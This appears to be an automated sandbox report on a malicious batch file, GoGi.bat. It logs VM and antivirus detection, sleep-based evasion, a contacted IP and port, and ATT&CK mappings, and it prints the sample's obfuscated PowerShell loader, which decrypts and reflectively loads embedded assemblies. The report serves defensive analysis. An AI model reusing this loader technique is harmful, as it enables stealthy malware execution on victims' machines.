Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5497Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4361Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4306Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2879Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4940Thread sleep count: 5497 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4940Thread sleep count: 4361 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5652Thread sleep time: -9223372036854770s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7076Thread sleep count: 4306 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7076Thread sleep count: 2879 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6816Thread sleep time: -4611686018427385s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6372Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\GoGi.bat" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\Desktop\GoGi.bat';$gPQY='CmYpnhamYpnnmYpngmYpnemYpnEmYpnxtmYpnenmYpnsmYpniomYpnnmYpn'.Replace('mYpn', ''),'LoaUtEPdUtEP'.Replace('UtEP', ''),'MaiCYgQnMCYgQodCYgQuleCYgQ'.Replace('CYgQ', ''),'SprHTnlitrHTn'.Replace('rHTn', ''),'TrrzhRarzhRnsfrzhRorrzhRmFrzhRirzhRnarzhRlBlrzhRorzhRckrzhR'.Replace('rzhR', ''),'GetuUbXCuUbXuuUbXruUbXreuUbXntuUbXPuUbXrouUbXcuUbXesuUbXsuUbX'.Replace('uUbX', ''),'FrFEdOomBFEdOasFEdOe64FEdOStrFEdOiFEdOngFEdO'.Replace('FEdO', ''),'ReanclddLncldinencldsncld'.Replace('ncld', ''),'DjPqYejPqYcojPqYmpjPqYrejPqYssjPqY'.Replace('jPqY', ''),'IPIJhnvPIJhokPIJhePIJh'.Replace('PIJh', ''),'CopZKPiyTZKPioZKPi'.Replace('ZKPi', ''),'ElIXGDeIXGDmIXGDenIXGDtAIXGDtIXGD'.Replace('IXGD', ''),'CruXrmeuXrmatuXrmeDeuXrmcryuXrmptuXrmoruXrm'.Replace('uXrm', ''),'EJuQRntJuQRrJuQRyPJuQRoinJuQRtJuQR'.Replace('JuQR', '');powershell -w hidden;function oukWk($hMAdX){$uBEEb=[System.Security.Cryptography.Aes]::Create();$uBEEb.Mode=[System.Security.Cryptography.CipherMode]::CBC;$uBEEb.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$uBEEb.Key=[System.Convert]::($gPQY[6])('TGdOerQan8DiYOIpc1W3E6Uf7wMJSi91JjPhdKuCB3Q=');$uBEEb.IV=[System.Convert]::($gPQY[6])('CruLH9j6aex2cpz0fozZ+w==');$XBRRE=$uBEEb.($gPQY[12])();$gomww=$XBRRE.($gPQY[4])($hMAdX,0,$hMAdX.Length);$XBRRE.Dispose();$uBEEb.Dispose();$gomww;}function SIliJ($hMAdX){$nQeHe=New-Object System.IO.MemoryStream(,$hMAdX);$EvPMN=New-Object System.IO.MemoryStream;$uxdRy=New-Object System.IO.Compression.GZipStream($nQeHe,[IO.Compression.CompressionMode]::($gPQY[8]));$uxdRy.($gPQY[10])($EvPMN);$uxdRy.Dispose();$nQeHe.Dispose();$EvPMN.Dispose();$EvPMN.ToArray();}$WrkBk=[System.IO.File]::($gPQY[7])([Console]::Title);$dItwN=SIliJ (oukWk ([Convert]::($gPQY[6])([System.Linq.Enumerable]::($gPQY[11])($WrkBk, 5).Substring(2))));$Yylgf=SIliJ (oukWk ([Convert]::($gPQY[6])([System.Linq.Enumerable]::($gPQY[11])($WrkBk, 6).Substring(2))));[System.Reflection.Assembly]::($gPQY[1])([byte[]]$Yylgf).($gPQY[13]).($gPQY[9])($null,$null);[System.Reflection.Assembly]::($gPQY[1])([byte[]]$dItwN).($gPQY[13]).($gPQY[9])($null,$null); "Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hiddenJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /s /d /c" echo $host.ui.rawui.windowtitle='c:\users\user\desktop\gogi.bat';$gpqy='cmypnhamypnnmypngmypnemypnemypnxtmypnenmypnsmypniomypnnmypn'.replace('mypn', ''),'loautepdutep'.replace('utep', ''),'maicygqnmcygqodcygqulecygq'.replace('cygq', ''),'sprhtnlitrhtn'.replace('rhtn', ''),'trrzhrarzhrnsfrzhrorrzhrmfrzhrirzhrnarzhrlblrzhrorzhrckrzhr'.replace('rzhr', ''),'getuubxcuubxuuubxruubxreuubxntuubxpuubxrouubxcuubxesuubxsuubx'.replace('uubx', ''),'frfedoombfedoasfedoe64fedostrfedoifedongfedo'.replace('fedo', ''),'reanclddlncldinencldsncld'.replace('ncld', ''),'djpqyejpqycojpqympjpqyrejpqyssjpqy'.replace('jpqy', ''),'ipijhnvpijhokpijhepijh'.replace('pijh', ''),'copzkpiytzkpiozkpi'.replace('zkpi', ''),'elixgdeixgdmixgdenixgdtaixgdtixgd'.replace('ixgd', ''),'cruxrmeuxrmatuxrmedeuxrmcryuxrmptuxrmoruxrm'.replace('uxrm', ''),'ejuqrntjuqrrjuqrypjuqroinjuqrtjuqr'.replace('juqr', '');powershell -w hidden;function oukwk($hmadx){$ubeeb=[system.security.cryptography.aes]::create();$ubeeb.mode=[system.security.cryptography.ciphermode]::cbc;$ubeeb.padding=[system.security.cryptography.paddingmode]::pkcs7;$ubeeb.key=[system.convert]::($gpqy[6])('tgdoerqan8diyoipc1w3e6uf7wmjsi91jjphdkucb3q=');$ubeeb.iv=[system.convert]::($gpqy[6])('crulh9j6aex2cpz0fozz+w==');$xbrre=$ubeeb.($gpqy[12])();$gomww=$xbrre.($gpqy[4])($hmadx,0,$hmadx.length);$xbrre.dispose();$ubeeb.dispose();$gomww;}function silij($hmadx){$nqehe=new-object system.io.memorystream(,$hmadx);$evpmn=new-object system.io.memorystream;$uxdry=new-object system.io.compression.gzipstream($nqehe,[io.compression.compressionmode]::($gpqy[8]));$uxdry.($gpqy[10])($evpmn);$uxdry.dispose();$nqehe.dispose();$evpmn.dispose();$evpmn.toarray();}$wrkbk=[system.io.file]::($gpqy[7])([console]::title);$ditwn=silij (oukwk ([convert]::($gpqy[6])([system.linq.enumerable]::($gpqy[11])($wrkbk, 5).substring(2))));$yylgf=silij (oukwk ([convert]::($gpqy[6])([system.linq.enumerable]::($gpqy[11])($wrkbk, 6).substring(2))));[system.reflection.assembly]::($gpqy[1])([byte[]]$yylgf).($gpqy[13]).($gpqy[9])($null,$null);[system.reflection.assembly]::($gpqy[1])([byte[]]$ditwn).($gpqy[13]).($gpqy[9])($null,$null); "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /s /d /c" echo $host.ui.rawui.windowtitle='c:\users\user\desktop\gogi.bat';$gpqy='cmypnhamypnnmypngmypnemypnemypnxtmypnenmypnsmypniomypnnmypn'.replace('mypn', ''),'loautepdutep'.replace('utep', ''),'maicygqnmcygqodcygqulecygq'.replace('cygq', ''),'sprhtnlitrhtn'.replace('rhtn', ''),'trrzhrarzhrnsfrzhrorrzhrmfrzhrirzhrnarzhrlblrzhrorzhrckrzhr'.replace('rzhr', ''),'getuubxcuubxuuubxruubxreuubxntuubxpuubxrouubxcuubxesuubxsuubx'.replace('uubx', ''),'frfedoombfedoasfedoe64fedostrfedoifedongfedo'.replace('fedo', ''),'reanclddlncldinencldsncld'.replace('ncld', ''),'djpqyejpqycojpqympjpqyrejpqyssjpqy'.replace('jpqy', ''),'ipijhnvpijhokpijhepijh'.replace('pijh', ''),'copzkpiytzkpiozkpi'.replace('zkpi', ''),'elixgdeixgdmixgdenixgdtaixgdtixgd'.replace('ixgd', ''),'cruxrmeuxrmatuxrmedeuxrmcryuxrmptuxrmoruxrm'.replace('uxrm', ''),'ejuqrntjuqrrjuqrypjuqroinjuqrtjuqr'.replace('juqr', '');powershell -w hidden;function oukwk($hmadx){$ubeeb=[system.security.cryptography.aes]::create();$ubeeb.mode=[system.security.cryptography.ciphermode]::cbc;$ubeeb.padding=[system.security.cryptography.paddingmode]::pkcs7;$ubeeb.key=[system.convert]::($gpqy[6])('tgdoerqan8diyoipc1w3e6uf7wmjsi91jjphdkucb3q=');$ubeeb.iv=[system.convert]::($gpqy[6])('crulh9j6aex2cpz0fozz+w==');$xbrre=$ubeeb.($gpqy[12])();$gomww=$xbrre.($gpqy[4])($hmadx,0,$hmadx.length);$xbrre.dispose();$ubeeb.dispose();$gomww;}function silij($hmadx){$nqehe=new-object system.io.memorystream(,$hmadx);$evpmn=new-object system.io.memorystream;$uxdry=new-object system.io.compression.gzipstream($nqehe,[io.compression.compressionmode]::($gpqy[8]));$uxdry.($gpqy[10])($evpmn);$uxdry.dispose();$nqehe.dispose();$evpmn.dispose();$evpmn.toarray();}$wrkbk=[system.io.file]::($gpqy[7])([console]::title);$ditwn=silij (oukwk ([convert]::($gpqy[6])([system.linq.enumerable]::($gpqy[11])($wrkbk, 5).substring(2))));$yylgf=silij (oukwk ([convert]::($gpqy[6])([system.linq.enumerable]::($gpqy[11])($wrkbk, 6).substring(2))));[system.reflection.assembly]::($gpqy[1])([byte[]]$yylgf).($gpqy[13]).($gpqy[9])($null,$null);[system.reflection.assembly]::($gpqy[1])([byte[]]$ditwn).($gpqy[13]).($gpqy[9])($null,$null); "Jump to behavior
Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting
Valid Accounts131
Windows Management Instrumentation
1
Scripting
11
Process Injection
1
Masquerading
OS Credential Dumping14
Security Software Discovery
Remote Services1
Archive Collected Data
1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts11
Command and Scripting Interpreter
1
DLL Side-Loading
1
DLL Side-Loading
151
Virtualization/Sandbox Evasion
LSASS Memory1
Process Discovery
Remote Desktop ProtocolData from Removable Media1
Non-Standard Port
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts1
PowerShell
Logon Script (Windows)Logon Script (Windows)11
Process Injection
Security Account Manager151
Virtualization/Sandbox Evasion
SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Obfuscated Files or Information
NTDS1
Application Window Discovery
Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading
LSA Secrets23
System Information Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1429040 Sample: GoGi.bat Startdate: 20/04/2024 Architecture: WINDOWS Score: 68 32 Snort IDS alert for network traffic 2->32 34 Antivirus detection for URL or domain 2->34 8 cmd.exe 1 2->8         started        process3 signatures4 36 Very long command line found 8->36 11 cmd.exe 1 8->11         started        14 conhost.exe 8->14         started        process5 signatures6 38 Very long command line found 11->38 16 powershell.exe 1 30 11->16         started        20 conhost.exe 11->20         started        22 cmd.exe 1 11->22         started        process7 dnsIp8 26 193.222.96.114, 4449, 49730 SWISSCOMSwisscomSwitzerlandLtdCH Germany 16->26 28 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 16->28 30 Suspicious powershell command line found 16->30 24 powershell.exe 25 16->24         started        signatures9 process10

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
GoGi.bat8%ReversingLabs
GoGi.bat5%VirustotalBrowse
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
bg.microsoft.map.fastly.net0%VirustotalBrowse
SourceDetectionScannerLabelLink
http://pesterbdd.com/images/Pester.png100%URL Reputationmalware
https://go.micro0%URL Reputationsafe
https://contoso.com/0%URL Reputationsafe
https://contoso.com/License0%URL Reputationsafe
https://contoso.com/Icon0%URL Reputationsafe
https://oneget.orgX0%URL Reputationsafe
https://oneget.org0%URL Reputationsafe
NameIPActiveMaliciousAntivirus DetectionReputation
bg.microsoft.map.fastly.net
199.232.210.172
truefalseunknown
NameSourceMaliciousAntivirus DetectionReputation
http://nuget.org/NuGet.exepowershell.exe, 00000006.00000002.1708498223.000001F272013000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1708498223.000001F271EDD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1691671492.000001F262233000.00000004.00000800.00020000.00000000.sdmpfalse
    high
